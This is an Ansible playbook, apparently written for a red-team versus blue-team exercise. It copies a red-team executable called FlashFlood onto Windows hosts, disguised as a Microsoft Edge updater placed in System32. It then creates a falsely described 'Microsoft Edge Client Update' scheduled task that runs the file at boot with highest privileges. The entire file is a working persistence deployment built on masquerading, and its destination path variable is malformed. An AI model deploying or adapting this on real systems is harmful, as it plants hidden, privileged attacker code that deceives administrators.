---
- name: Deploy FlashFlood
  hosts: blueteamwin
  gather_facts: yes
  vars:
    updater_exe: "~/infrastructure/redteam/FlashFlood/MicrosoftEdgeV1_2Updater.exe"
    dest_path: "C:\\Windows\\System32\\{{ updater_exe }}"
    task_name: "Microsoft Edge Client Update"
    task_description: "Automatically updates Microsoft Edge Components"
  tasks:
    - name: Copy Microsoft Edge Updater to Windows hosts
      win_copy:
        src: "{{ updater_exe }}"
        dest: "{{ dest_path }}"
      when: updater_exe is defined

    - name: Create scheduled task to run updater on startup with highest privileges
      win_scheduled_task:
        name: "{{ task_name }}"
        description: "{{ task_description }}"
        actions:
          - path: "{{ dest_path }}"
        triggers:
          - type: boot
        start_when_available: yes
        force: yes
        level: highest
        enabled: yes
        state: present
